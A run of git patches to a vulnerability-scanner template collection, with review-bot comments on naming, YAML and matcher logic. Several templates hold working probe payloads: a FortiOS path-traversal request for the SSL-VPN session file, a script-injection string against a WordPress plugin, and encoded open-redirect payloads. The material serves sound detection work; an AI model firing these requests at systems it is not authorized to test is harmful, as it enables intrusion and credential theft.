From 101b139dfd6d6ff9ddcead0b25a29b61baee248d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 25 Jun 2022 01:02:35 +0530
Subject: [PATCH 01/21] Update sym404.yaml
---
 vulnerabilities/wordpress/sym404.yaml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/vulnerabilities/wordpress/sym404.yaml b/vulnerabilities/wordpress/sym404.yaml
index 3caf1c5a27..7f5c93cba2 100644
--- a/vulnerabilities/wordpress/sym404.yaml
+++ b/vulnerabilities/wordpress/sym404.yaml
@@ -5,6 +5,8 @@ info:
 author: pussycat0x
 severity: High
 description: Searches for sensitive directories present in the sym404.
+ reference:
+ - https://twitter.com/momika233/status/1540325055280070656
 metadata:
 verified: true
 google-dork: inurl:"/wp-includes/sym404/"
From f95372222b49bbd43660cd090d1c27f01566077c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 25 Jun 2022 07:47:04 +0530
Subject: [PATCH 02/21] Update CVE-2020-20982.yaml
---
 cves/2020/CVE-2020-20982.yaml | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-20982.yaml b/cves/2020/CVE-2020-20982.yaml
index 0c9b36e71f..71b8c59ff6 100644
--- a/cves/2020/CVE-2020-20982.yaml
+++ b/cves/2020/CVE-2020-20982.yaml
@@ -4,7 +4,7 @@ info:
 name: shadoweb wdja v1.5.1 - Cross-Site Scripting
 author: pikpikcu
 severity: critical
- description: "shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php."
+ description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.
 reference:
 - https://github.com/shadoweb/wdja/issues/1
 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982
@@ -34,4 +34,8 @@ requests:
 words:
 - 'text/html'
+ - type: status
+ status:
+ - 200
+
 # Enhanced by mp on 2022/04/27
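Review bot: In cves/2020/CVE-2020-20982.yaml (hunk `@@ -34,4 +34,8 @@`), the added `status: 200` matcher tightens the template only if the matcher list is combined with `matchers-condition: and`; that key sits above the hunk and is not visible here. nuclei combines matchers with `or` by default, in which case any 200 response would now be reported as a finding. Confirm the key is present, or add `matchers-condition: and` directly above `matchers:`.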
From 75c6c22a27bdf863911e6dae28ce725c490ffca8 Mon Sep 17 00:00:00 2001
From: Krishna Agarwal <85845881+Kr1shna4garwal@users.noreply.github.com>
Date: Sat, 25 Jun 2022 12:38:56 +0530
Subject: [PATCH 04/21] Added URL encoded payload (#4664)
---
 vulnerabilities/generic/open-redirect.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml
index 7e6cd07c7e..9882c469e4 100644
--- a/vulnerabilities/generic/open-redirect.yaml
+++ b/vulnerabilities/generic/open-redirect.yaml
@@ -39,6 +39,7 @@ requests:
 - '//\tinteract.sh/'
 - '//interact.sh/%2F..'
 - '//interact.sh//'
+ - '//%69%6e%74%65%72%61%63%74%2e%73%68'
 - '//interact.sh@//'
 - '//interact.sh\tinteract.sh/'
 - '//https://interact.sh@//'
@@ -119,4 +120,4 @@ requests:
 - 302
 - 307
 - 308
- condition: or
\ No newline at end of file
+ condition: or
From c80fea4a8ccbe242f19c025d20b5a18f607d36ba Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sat, 25 Jun 2022 03:14:58 -0400
Subject: [PATCH 06/21] Dashboard Content Enhancements (#4665)
* Enhancement: cves/2021/CVE-2021-24750.yaml by mp
* Enhancement: cves/2021/CVE-2021-24340.yaml by mp
* Enhancement: cves/2021/CVE-2021-24278.yaml by mp
* Enhancement: cves/2021/CVE-2021-24226.yaml by mp
* Enhancement: cves/2021/CVE-2021-24146.yaml by mp
* Remove link to opencve.io in favor of NVD
* Minor cleanups and added cve-id to CVE-2022-1904.yaml
Co-authored-by: sullo
---
 cves/2021/CVE-2021-24146.yaml | 7 +++++--
 cves/2021/CVE-2021-24226.yaml | 7 ++++---
 cves/2021/CVE-2021-24278.yaml | 10 ++++++----
 cves/2021/CVE-2021-24340.yaml | 7 +++++--
 cves/2021/CVE-2021-24750.yaml | 8 +++++---
 cves/2021/CVE-2021-3017.yaml | 2 +-
 cves/2021/CVE-2021-46379.yaml | 9 +++++----
 cves/2022/CVE-2022-1904.yaml | 5 ++++-
 cves/2022/CVE-2022-26148.yaml | 2 +-
 9 files changed, 36 insertions(+), 21 deletions(-)
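Review bot: The new entry `'//%69%6e%74%65%72%61%63%74%2e%73%68'` in vulnerabilities/generic/open-redirect.yaml is opaque to anyone reading the payload list; a trailing comment such as `# percent-encoded //interact.sh` would document it. The matcher for this template is outside the hunk; if it looks for the literal host in the `Location` header, a target that echoes the value without decoding it will not be reported, so the entry adds coverage only where the server decodes before redirecting. That limitation is worth stating in the same comment.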
diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml
index 3b9fa118f5..483136159e 100644
--- a/cves/2021/CVE-2021-24146.yaml
+++ b/cves/2021/CVE-2021-24146.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-24146
 info:
- name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
+ name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure
 author: random_robbie
 severity: high
- description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
+ description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.
 reference:
 - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
 - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24146
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
 cvss-score: 7.5
@@ -32,3 +33,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml
index 80cb8fab90..53828a49bf 100644
--- a/cves/2021/CVE-2021-24226.yaml
+++ b/cves/2021/CVE-2021-24226.yaml
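Review bot: The rewritten description in cves/2021/CVE-2021-24146.yaml still reads "allowing unauthenticated users to exports all events data"; it should be `to export all event data`. The template is now named "Sensitive Information Disclosure", but the unchanged `cvss-metrics` context line carries `C:N/I:H/A:N`, a vector that states an integrity impact and no confidentiality impact. Since the commit adds the NVD link, the vector is worth checking against that entry so that triage by CVSS component does not misfile the finding.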
@@ -1,11 +1,10 @@
 id: CVE-2021-24226
 info:
- name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage
+ name: AccessAlly <3.5.7 - Sensitive Information Leakage
 author: dhiyaneshDK
 severity: high
- description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which
- contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required.
+ description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \"resource/frontend/product/product-shortcode.php\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.
 reference:
 - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16
 - https://nvd.nist.gov/vuln/detail/CVE-2021-24226
@@ -32,3 +31,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24278.yaml b/cves/2021/CVE-2021-24278.yaml
index 05508a9689..db00615e37 100644
--- a/cves/2021/CVE-2021-24278.yaml
+++ b/cves/2021/CVE-2021-24278.yaml
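Review bot: The new `description` in cves/2021/CVE-2021-24226.yaml keeps `\"resource/frontend/product/product-shortcode.php\"` inside an unquoted scalar, where YAML does not process escapes, so the backslashes end up in the rendered text. Write the path with plain double quotes, or wrap the whole value in double quotes if the escapes are meant to stay. The new name also lacks the `WordPress` prefix that the other renamed templates in this commit gained.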
@@ -1,14 +1,14 @@
 id: CVE-2021-24278
 info:
- name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
+ name: WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation
 author: 2rs3c
 severity: high
- description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
+ description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
 reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278
 - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
 - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24278
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
@@ -43,4 +43,6 @@ requests:
 - type: regex
 part: body
 regex:
- - '"nonce":"[a-f0-9]+"'
\ No newline at end of file
+ - '"nonce":"[a-f0-9]+"'
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml
index d23a363deb..83981c0099 100644
--- a/cves/2021/CVE-2021-24340.yaml
+++ b/cves/2021/CVE-2021-24340.yaml
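Review bot: The rename in cves/2021/CVE-2021-24278.yaml changes the affected product: the removed lines and the Wordfence reference name the plugin "Redirection for Contact Form 7", while the new `name` and `description` say "WordPress Contact Form 7", which is a different plugin. Anyone triaging a hit would look for the wrong component. Keep the plugin name, e.g. `name: WordPress Redirection for Contact Form 7 <2.3.4 - Arbitrary Nonce Generation`, and the same in the description. The same loss appears in cves/2021/CVE-2021-24340.yaml, where "WP Statistics" becomes "WordPress Statistics" and "WordPress Statistic plugin"; both new names also drop "Unauthenticated", which is the detail a reader uses to judge exposure.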
@@ -1,15 +1,16 @@
 id: CVE-2021-24340
 info:
- name: WordPress Plugin WP Statistics < 13.0.8 - Unauthenticated Time-Based Blind SQL Injection
+ name: WordPress Statistics <13.0.8 - Blind SQL Injection
 author: lotusdll
 severity: high
- description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
+ description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.
 reference:
 - https://www.exploit-db.com/exploits/49894
 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
 - https://github.com/Udyz/WP-Statistics-BlindSQL
 - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24340
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
@@ -49,3 +50,5 @@ requests:
 - type: dsl
 dsl:
 - compare_versions(version, '< 13.0.8')
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24750.yaml b/cves/2021/CVE-2021-24750.yaml
index 9e34e7e0ac..5cd49508c5 100644
--- a/cves/2021/CVE-2021-24750.yaml
+++ b/cves/2021/CVE-2021-24750.yaml
@@ -1,15 +1,15 @@
 id: CVE-2021-24750
 info:
- name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
+ name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection
 author: cckuakilong
 severity: high
- description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
+ description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
 reference:
 - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
 - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
 - https://plugins.trac.wordpress.org/changeset/2622268
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 8.8
@@ -43,3 +43,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml
index 7a07931362..9dc06e0212 100644
--- a/cves/2021/CVE-2021-3017.yaml
+++ b/cves/2021/CVE-2021-3017.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-3017
 info:
- name: Intelbras WIN 300/WRN 342 Credential Disclosure
+ name: Intelbras WIN 300/WRN 342 - Credentials Disclosure
 author: pikpikcu
 severity: high
 description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml
index a64ce02434..db866ee120 100644
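Review bot: The new name in cves/2021/CVE-2021-24750.yaml reads `<4.8 -SQL Injection`; the separator is missing its trailing space and should be `<4.8 - SQL Injection`, matching the `Product <version - Issue` form the other names in this commit use. The name and description also replace "WP Visitor Statistics" with "WordPress Visitor Statistics", which no longer matches the plugin name given in the removed lines.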
--- a/cves/2021/CVE-2021-46379.yaml
+++ b/cves/2021/CVE-2021-46379.yaml
@@ -4,12 +4,11 @@ info:
 name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect
 author: 0x_Akoko
 severity: medium
- description: DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site.
+ description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.
 reference:
- - https://www.opencve.io/cve/CVE-2021-46379
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-46379
 - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
- - https://www.cvedetails.com/cve/CVE-2021-46379
- - https://www.dlink.com/en/security-bulletin/
+ - https://www.dlink.com/en/security-bulletin
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
@@ -29,3 +28,5 @@ requests:
 part: header
 regex:
 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by cs 06/22/2022
diff --git a/cves/2022/CVE-2022-1904.yaml b/cves/2022/CVE-2022-1904.yaml
index b1fc88e18e..21521ab7e8 100644
--- a/cves/2022/CVE-2022-1904.yaml
+++ b/cves/2022/CVE-2022-1904.yaml
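Review bot: Dropping the trailing slash from the D-Link bulletin reference in cves/2021/CVE-2021-46379.yaml does not hold: the auto-generated annotation commit later in this series (PATCH 08/21) adds `https://www.dlink.com/en/security-bulletin/` back, leaving two near-identical entries. Keep the slashed form here or correct it at the annotation source. The trailer `# Enhanced by cs 06/22/2022` also departs from the `# Enhanced by mp on 2022/06/22` form used in the other files of this commit, and the new description needs an article ("contains an incorrect access control vulnerability").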
@@ -4,7 +4,10 @@ info:
 name: Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting
 author: Akincibor
 severity: medium
- description: The plugin does not sanitise and escape parameter before outputting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a Reflected Cross-Site Scripting.
+ description: |
+ The plugin does not sanitize and escape parameter before reflecting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a reflected cross-site scripting.
+ classification:
+ cve-id: CVE-2022-1904
 reference:
 - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904
diff --git a/cves/2022/CVE-2022-26148.yaml b/cves/2022/CVE-2022-26148.yaml
index 315b0b25a8..145648a2d6 100644
--- a/cves/2022/CVE-2022-26148.yaml
+++ b/cves/2022/CVE-2022-26148.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-26148
 info:
- name: Grafana & Zabbix Integration - Credential Disclosure
+ name: Grafana & Zabbix Integration - Credentials Disclosure
 author: Geekby
 severity: critical
 description: |
From 167ff1e909587f10d44bd6fe674adc99f475f385 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 25 Jun 2022 07:26:43 +0000
Subject: [PATCH 08/21] Auto Generated CVE annotations [Sat Jun 25 07:26:43 UTC 2022] :robot:
---
 cves/2021/CVE-2021-46379.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml
index db866ee120..270692bd08 100644
--- a/cves/2021/CVE-2021-46379.yaml
+++ b/cves/2021/CVE-2021-46379.yaml
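Review bot: In cves/2022/CVE-2022-1904.yaml the one-line description is now a `|` literal block, which appends a trailing newline to the value; `description: >-` or a plain single-line scalar avoids that. The added `classification` block carries only `cve-id` and is placed above `reference`, whereas the other templates on this page put `classification` after the reference list. CVE-2021-24278.yaml in this same commit swaps its cve.mitre.org link for the NVD one, but here the mitre reference stays, and the name keeps the old `< 3.2.1` spacing and says only "The plugin" in the description.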
@@ -9,6 +9,7 @@ info:
 - https://nvd.nist.gov/vuln/detail/CVE-2021-46379
 - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
 - https://www.dlink.com/en/security-bulletin
+ - https://www.dlink.com/en/security-bulletin/
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
From c0d51a6efa8ef592833f75b8933441e1c9204c10 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 25 Jun 2022 13:18:45 +0530
Subject: [PATCH 09/21] Update CVE-2018-13379.yaml
---
 cves/2018/CVE-2018-13379.yaml | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)
diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml
index 176a17dba7..ca3b635eb6 100644
--- a/cves/2018/CVE-2018-13379.yaml
+++ b/cves/2018/CVE-2018-13379.yaml
@@ -14,15 +14,19 @@ info:
 cvss-score: 9.8
 cve-id: CVE-2018-13379
 cwe-id: CWE-22
- tags: cve,cve2018,fortios,cisa
+ metadata:
+ verified: true
+ shodan-query: http.html:"/remote/login" "xxxxxxxx"
+ tags: cve,cve2018,fortios,cisa,lfi
 requests:
 - method: GET
 path:
 - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
- matchers:
- - type: word
- words:
- - "var fgt_lang"
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - '^var fgt_lang ='
 # Enhanced by mp on 2022/05/12
From 0c4c64ed5cdafd7ea343c11ed8923659547f286c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 25 Jun 2022 14:11:05 +0530
Subject: [PATCH 11/21] Create new-user-approve-xss.yaml
---
 .../wordpress/new-user-approve-xss.yaml | 45 +++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 vulnerabilities/wordpress/new-user-approve-xss.yaml
diff --git a/vulnerabilities/wordpress/new-user-approve-xss.yaml b/vulnerabilities/wordpress/new-user-approve-xss.yaml
new file mode 100644
index 0000000000..7efb421348
--- /dev/null
+++ b/vulnerabilities/wordpress/new-user-approve-xss.yaml
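Review bot: The new regex `'^var fgt_lang ='` in cves/2018/CVE-2018-13379.yaml is the only matcher, and without the `(?m)` flag `^` anchors at the very start of the body, so a response with any leading bytes is missed while an error page that begins with that string is still reported. The matched text looks like the wrapper the language endpoint emits rather than content of the requested file, so a hit presumably shows that the endpoint answered, not that data came back; that is worth confirming against a patched device. Pairing the regex with a status check under `matchers-condition: and` rules out the error-page case. The `matchers:` key appears as both removed and added, so its indentation changed and should be checked against the sibling keys of `- method: GET`.

```yaml
    # … unchanged: method and path …
    matchers-condition: and
    matchers:
      # … unchanged: regex matcher on body …

      - type: status
        status:
          - 200
```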
@@ -0,0 +1,45 @@
+id: new-user-approve-xss
+
+info:
+ name: New User Approve < 2.4.1 - Reflected Cross-Site Scripting
+ author: Akincibor
+ severity: medium
+ description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+ reference:
+ - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a
+ - https://wordpress.org/plugins/new-user-approve
+ metadata:
+ verified: true
+ tags: wp,wordpress,xss,authenticated,wp-plugin
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '?a">&new-user-approve-settings'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From ce149b9f7625042e1d335e468dd4578bbadb13cf Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 25 Jun 2022 09:25:18 +0000
Subject: [PATCH 13/21] Auto Generated New Template Addition List [Sat Jun 25 09:25:18 UTC 2022] :robot:
---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 4eb8ec55c6..248f8488d6 100644
--- a/.new-additions
+++ b/.new-additions
@@ -19,4 +19,5 @@ token-spray/api-digitalocean.yaml
 token-spray/api-segment.yaml
 vulnerabilities/other/royalevent/royalevent-management-xss.yaml
 vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
+vulnerabilities/wordpress/new-user-approve-xss.yaml
 vulnerabilities/wordpress/sym404.yaml
From e0d0097a46a12817fda9fd8d59e05b87c1bc435e Mon Sep 17 00:00:00 2001
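Review bot: The description in vulnerabilities/wordpress/new-user-approve-xss.yaml says only "The plugin"; it should name the product, the fixed version from the title and the login requirement implied by the `authenticated` tag, e.g. `description: WordPress New User Approve plugin before 2.4.1 does not escape some URLs before outputting them in attributes, leading to reflected cross-site scripting in the admin dashboard of a logged-in user.` The template also has no `classification` block, unlike the CVE templates on this page. As displayed here the body word is `'?a">&new-user-approve-settings'`, which contains no `<script>` element; if that is the file's actual text it cannot match a response that reflects the request's payload between `">` and `&`, so compare it with the request line.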
From: Arman <65326024+tes5hacks@users.noreply.github.com>
Date: Mon, 27 Jun 2022 04:00:31 -0400
Subject: [PATCH 14/21] Create intercom.yaml (#4612)
* Create intercom.yaml
* lint fixes
Co-authored-by: sandeep
---
 technologies/intercom.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 technologies/intercom.yaml
diff --git a/technologies/intercom.yaml b/technologies/intercom.yaml
new file mode 100644
index 0000000000..bec3adb077
--- /dev/null
+++ b/technologies/intercom.yaml
@@ -0,0 +1,20 @@
+id: intercom
+
+info:
+ name: Intercom widget detection
+ author: tess
+ severity: info
+ tags: intercom,tech
+ reference: https://www.intercom.com
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ redirects: true
+ max-redirects: 3
+ matchers:
+ - type: word
+ words:
+ - 'intercom'
\ No newline at end of file
From 230b1a3fb569fae78a48067e46693af3142be574 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 27 Jun 2022 08:00:48 +0000
Subject: [PATCH 15/21] Auto Generated New Template Addition List [Mon Jun 27 08:00:48 UTC 2022] :robot:
---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 248f8488d6..52198e50d3 100644
--- a/.new-additions
+++ b/.new-additions
@@ -15,6 +15,7 @@ exposed-panels/teamcity-login-panel.yaml
 misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
 misconfiguration/teamcity/teamcity-registration-enabled.yaml
 misconfiguration/wp-registration-enabled.yaml
+technologies/intercom.yaml
 token-spray/api-digitalocean.yaml
 token-spray/api-segment.yaml
 vulnerabilities/other/royalevent/royalevent-management-xss.yaml
From dda8a8aa12a113f7032fa42b4e56df00ddbbfc88 Mon Sep 17 00:00:00 2001
From: Ice3man
Date: Mon, 27 Jun 2022 14:16:45 +0530
Subject: [PATCH 16/21] Added do not edit message to nuclei-ignore (#4674)
---
 .nuclei-ignore | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 832ecac550..31dc7b597f 100644
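Review bot: The single matcher `- 'intercom'` in technologies/intercom.yaml fires on any response that contains that word anywhere, such as a blog post or an outbound link, so the template will report the widget on sites that do not embed it. Match something specific to the embed instead, for example the loader host `- 'widget.intercom.io'`, and state `part: body` explicitly. `reference:` is written as a scalar here but as a list in the other templates on this page, and the file ends without a newline.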
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -3,6 +3,11 @@
 #
 # This is default list of tags and files to excluded from default nuclei scan.
 # More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
+#
+# ============ DO NOT EDIT ============
+# Automatically updated by nuclei on execution from nuclei-templates
+# User changes should be in nuclei config file
+# ============ DO NOT EDIT ============
 # tags is a list of tags to ignore execution for
 # unless asked for by the user.
From 87c9007f60c9c84655b760b5a5f51c01c41ca730 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 27 Jun 2022 14:59:47 +0530
Subject: [PATCH 18/21] added missing cve tags
---
 cves/2005/CVE-2005-3344.yaml | 4 ++--
 cves/2008/CVE-2008-5587.yaml | 2 +-
 cves/2016/CVE-2016-1555.yaml | 2 +-
 cves/2019/CVE-2019-16931.yaml | 2 +-
 cves/2020/CVE-2020-26876.yaml | 6 +++---
 cves/2021/CVE-2021-25120.yaml | 2 +-
 cves/2021/CVE-2021-42071.yaml | 2 +-
 7 files changed, 10 insertions(+), 10 deletions(-)
diff --git a/cves/2005/CVE-2005-3344.yaml b/cves/2005/CVE-2005-3344.yaml
index 9a01ed2fa9..b0c576e378 100644
--- a/cves/2005/CVE-2005-3344.yaml
+++ b/cves/2005/CVE-2005-3344.yaml
@@ -12,13 +12,14 @@ info:
 - http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
 classification:
 cve-id: CVE-2005-3344
- tags: horde,unauth
+ tags: cve,cve2005,horde,unauth
 requests:
 - method: GET
 path:
 - "{{BaseURL}}/horde/admin/user.php"
 - "{{BaseURL}}/admin/user.php"
+
 headers:
 Content-Type: text/html
@@ -28,7 +29,6 @@ requests:
 - type: word
 words:
 - "Horde :: User Administration"
- condition: and
 - type: status
 status:
diff --git a/cves/2008/CVE-2008-5587.yaml b/cves/2008/CVE-2008-5587.yaml
index b9564b91b0..492c9f3f17 100644
--- a/cves/2008/CVE-2008-5587.yaml
+++ b/cves/2008/CVE-2008-5587.yaml
@@ -14,7 +14,7 @@ info:
 cve-id: CVE-2008-5587
 metadata:
 shodan-query: http.title:"phpPgAdmin"
- tags: cve2008,lfi,phppgadmin
+ tags: cve,cve2008,lfi,phppgadmin
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1555.yaml b/cves/2016/CVE-2016-1555.yaml
index 0afd89e84c..8351a4be01 100644
--- a/cves/2016/CVE-2016-1555.yaml
+++ b/cves/2016/CVE-2016-1555.yaml
@@ -15,7 +15,7 @@ info:
 cvss-score: 9.8
 cve-id: CVE-2016-1555
 cwe-id: CWE-77
- tags: netgear,rce,oast,router
+ tags: cve,cve2016,netgear,rce,oast,router
 requests:
 - raw:
diff --git a/cves/2019/CVE-2019-16931.yaml b/cves/2019/CVE-2019-16931.yaml
index ecf3414317..92723cdf96 100644
--- a/cves/2019/CVE-2019-16931.yaml
+++ b/cves/2019/CVE-2019-16931.yaml
@@ -18,7 +18,7 @@ info:
 cwe-id: CWE-79
 metadata:
 verified: "true"
- tags: wp-plugin,wordpress,wp,xss,unauth
+ tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-26876.yaml b/cves/2020/CVE-2020-26876.yaml
index 1a49f7a287..3908afcb52 100644
--- a/cves/2020/CVE-2020-26876.yaml
+++ b/cves/2020/CVE-2020-26876.yaml
@@ -15,7 +15,7 @@ info:
 cvss-score: 7.5
 cve-id: CVE-2020-26876
 cwe-id: CWE-306
